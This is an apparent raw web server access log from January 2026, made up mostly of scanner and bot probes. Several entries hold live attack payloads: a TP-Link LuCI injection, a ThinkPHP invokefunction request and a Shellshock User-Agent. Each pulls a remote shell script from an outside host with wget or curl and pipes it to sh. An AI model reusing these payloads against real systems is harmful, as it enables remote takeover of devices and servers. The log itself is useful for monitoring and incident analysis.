AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:08:02:10 +0000] 200 - GET http 91.82.83.208 "/" [Client 138.68.72.233] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36" "-" +[24/Jan/2026:08:02:11 +0000] 400 - GET http 91.82.83.208 "/" [Client 138.68.72.233] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36" "-" +[24/Jan/2026:08:02:11 +0000] 404 - GET http 91.82.83.208 "/robots.txt" [Client 138.68.72.233] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36" "-" +[24/Jan/2026:08:02:11 +0000] 404 - GET http 91.82.83.208 "/.well-known/security.txt" [Client 138.68.72.233] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36" "-" +[24/Jan/2026:08:02:12 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[24/Jan/2026:08:02:12 +0000] 404 - GET http 91.82.83.208 "/security.txt" [Client 138.68.72.233] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36" "-" +[24/Jan/2026:08:02:12 +0000] 404 - GET http 91.82.83.208 "/.well-known/robots.txt" [Client 138.68.72.233] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36" "-" +[24/Jan/2026:08:15:59 +0000] 200 - GET http 91.82.83.208 "/" [Client 93.119.174.188] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[24/Jan/2026:08:17:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:08:23:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 167.94.146.50] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[24/Jan/2026:08:23:26 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.146.50] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:08:23:27 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[24/Jan/2026:08:23:27 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.146.50] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:08:23:31 +0000] 404 - GET http 91.82.83.208 "/wiki" [Client 167.94.146.50] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[24/Jan/2026:08:23:34 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.146.50] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:08:24:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:08:26:21 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:08:39:26 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:08:48:42 +0000] 400 - GET http 91.82.83.208 "/" [Client 3.130.96.91] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[24/Jan/2026:08:48:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:08:48:49 +0000] 400 - - http localhost "-" [Client 3.130.96.91] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:08:48:55 +0000] 400 - GET http 91.82.83.208 "/" [Client 3.130.96.91] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[24/Jan/2026:08:51:49 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh)" [Client 221.159.119.6] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:08:51:50 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh)" [Client 221.159.119.6] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:08:55:03 +0000] 400 - - http localhost "-" [Client 3.130.96.91] [Length 0] [Gzip -] "-" "-" +[24/Jan/2026:08:59:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 81.10.59.84] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[24/Jan/2026:09:04:29 +0000] 404 - POST http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 192.159.99.95] [Length 0] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[24/Jan/2026:09:04:30 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C6f71068b%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C6f71068b%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C6f71068b%29%7Csh" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[24/Jan/2026:09:04:30 +0000] 404 - POST http 91.82.83.208 "/index.php?s=captcha" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[24/Jan/2026:09:04:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 192.159.99.95] [Length 1033] [Gzip -] "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh?=\x5C6f71068b||busybox wget -qO- http://41.231.37.153/rondo.qre.sh?=\x5C6f71068b||curl -s http://41.231.37.153/rondo.qre.sh?=\x5C6f71068b)|sh\x22& # rondo2012@atomicmail.io" "-" +[24/Jan/2026:09:04:30 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 192.159.99.95] [Length 0] [Gzip -] "-" "-" +[24/Jan/2026:09:06:02 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 38.110.46.241] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:09:07:34 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:09:07:55 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.51] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:09:07:55 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.51] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:09:15:34 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:09:15:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.153.47.201] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[24/Jan/2026:09:20:59 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:09:22:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:09:31:46 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:09:36:49 +0000] 200 - GET http 91.82.83.208 "/" [Client 38.110.46.239] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3" "-" +[24/Jan/2026:09:38:44 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 141.98.11.181] [Length 0] [Gzip -] "-" "-" +[24/Jan/2026:09:40:40 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:09:53:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:09:58:47 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[24/Jan/2026:10:04:19 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:10:05:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 51.254.59.113] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" +[24/Jan/2026:10:16:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:10:19:53 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:10:37:08 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 164.92.179.63] [Length 1033] [Gzip -] "-" "-" +[24/Jan/2026:10:37:08 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 164.92.179.63] [Length 1033] [Gzip -] "-" "-" +[24/Jan/2026:10:37:08 +0000] 404 - GET http 91.82.83.208 "/odinhttpcall1769251028" [Client 164.92.179.63] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[24/Jan/2026:10:37:08 +0000] 404 - POST http 91.82.83.208 "/sdk" [Client 164.92.179.63] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[24/Jan/2026:10:37:08 +0000] 404 - GET http 91.82.83.208 "/HNAP1" [Client 164.92.179.63] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[24/Jan/2026:10:37:08 +0000] 404 - GET http 91.82.83.208 "/evox/about" [Client 164.92.179.63] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[24/Jan/2026:10:37:08 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 164.92.179.63] [Length 1033] [Gzip -] "-" "-" +[24/Jan/2026:10:37:08 +0000] 200 - GET http 91.82.83.208 "/" [Client 164.92.179.63] [Length 1033] [Gzip -] "-" "-" +[24/Jan/2026:10:37:08 +0000] 404 - GET http 91.82.83.208 "/query?q=SHOW+DIAGNOSTICS" [Client 104.248.42.184] [Length 150] [Gzip -] "Go-http-client/1.1" "-" +[24/Jan/2026:10:37:08 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/authLogin.cgi" [Client 134.209.238.145] [Length 150] [Gzip -] "Go-http-client/1.1" "-" +[24/Jan/2026:10:37:08 +0000] 404 - GET http 91.82.83.208 "/solr/admin/info/system" [Client 134.209.238.145] [Length 150] [Gzip -] "Go-http-client/1.1" "-" +[24/Jan/2026:10:37:09 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.59.215.137] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:10:37:09 +0000] 404 - GET http 91.82.83.208 "/solr/admin/cores?action=STATUS&wt=json" [Client 134.209.238.145] [Length 150] [Gzip -] "Go-http-client/1.1" "-" +[24/Jan/2026:10:37:09 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.59.215.137] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:10:37:10 +0000] 200 - GET http 91.82.83.208 "/" [Client 188.166.167.61] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[24/Jan/2026:10:37:11 +0000] 200 - GET http 91.82.83.208 "/" [Client 46.101.110.54] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[24/Jan/2026:10:37:11 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 46.101.110.54] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:10:37:12 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[24/Jan/2026:10:38:12 +0000] 404 - GET http 91.82.83.208 "/v2/_catalog" [Client 138.197.186.56] [Length 150] [Gzip -] "Go-http-client/1.1" "-" +[24/Jan/2026:10:40:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:10:42:59 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:10:43:29 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:10:47:27 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:10:49:30 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:10:57:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:11:01:25 +0000] 200 - HEAD http 91.82.83.208 "/" [Client 176.65.148.66] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org )" "-" +[24/Jan/2026:11:01:25 +0000] 206 - GET http 91.82.83.208 "/" [Client 176.65.148.66] [Length 1033] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org )" "-" +[24/Jan/2026:11:01:26 +0000] 404 - HEAD http 91.82.83.208 "/_next" [Client 176.65.148.66] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org )" "-" +[24/Jan/2026:11:01:27 +0000] 405 - POST http 91.82.83.208 "/" [Client 176.65.148.66] [Length 154] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org )" "-" +[24/Jan/2026:11:01:28 +0000] 404 - POST http 91.82.83.208 "/_next" [Client 176.65.148.66] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org )" "-" +[24/Jan/2026:11:06:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:11:08:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:11:19:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/style.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/style.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/themes/style.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/style.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/style.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/chosen.php?p=" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/file.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/flower.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/gifclass.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/bless.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/class-t.api.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/blurbs.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/akcc.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/abcd.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/shelp.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/cord.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/dex.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/admin-ajax.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/file2.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:12 +0000] 404 - GET http profibot.direct.quickconnect.to "//zwso.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/zwso.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/hellopress/wp_mna.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/bolt.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/shlo.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/133.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/ahax.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/php8.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/lufix1.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/witmm.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/css/index.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/index.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/index.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/ioxi-o.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/222.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/files.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-editor.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/txets.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/txets.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/txets.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/postnews.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/postnews.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:19:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/postnews.php" [Client 104.28.235.57] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[24/Jan/2026:11:36:23 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:11:36:40 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:11:43:01 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:11:46:43 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:11:52:19 +0000] 200 - GET http 91.82.83.208 "/" [Client 64.82.206.194] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[24/Jan/2026:11:52:19 +0000] 405 - POST http 91.82.83.208 "/" [Client 64.82.206.194] [Length 556] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[24/Jan/2026:11:54:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 